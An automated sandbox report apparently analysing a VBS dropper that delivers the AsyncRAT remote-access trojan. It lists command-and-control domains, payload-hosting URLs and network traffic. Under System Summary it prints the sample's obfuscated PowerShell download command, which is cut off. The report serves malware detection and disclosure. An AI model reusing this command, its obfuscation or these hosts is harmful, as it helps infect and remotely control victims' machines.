Windows Analysis Report
72625413524.vbs

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: aprilxrwonew8450.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: aprilxrwonew8450.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.5:49735 -> 134.255.217.251:8450

Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /error/xwapri.txt HTTP/1.1Host: pantherropes.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View	IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: ACTIVE-SERVERSactive-serverscomDE ACTIVE-SERVERSactive-serverscomDE
Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /d/FIwXa HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/FIwXa HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /error/xwapri.txt HTTP/1.1Host: pantherropes.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2921006320.000002209C91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2921006320.000002209C8CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2921006320.000002209C906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2910379828.000002793BDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.2235743544.000002CC1EA0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232406242.000002CC1E9B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233073926.000002CC1CC2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232406242.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236434189.000002CC1CC34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233745693.000002CC1CC33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232960454.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/FIwXa
Source: wscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/FIwXaU
Source: wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/FIwXaok
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2904251740.0000027939F0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728

Source: unknown	HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.206.104.215:443 -> 192.168.2.5:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8834
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8834			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_01060EB8	7_2_01060EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0106D4BC	7_2_0106D4BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_051BC1C8	7_2_051BC1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_051B70F0	7_2_051B70F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_051BDE90	7_2_051BDE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_051BBBA0	7_2_051BBBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_051B0738	7_2_051B0738

Source: 72625413524.vbs

Initial sample: Strings found which are bigger than 50

Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
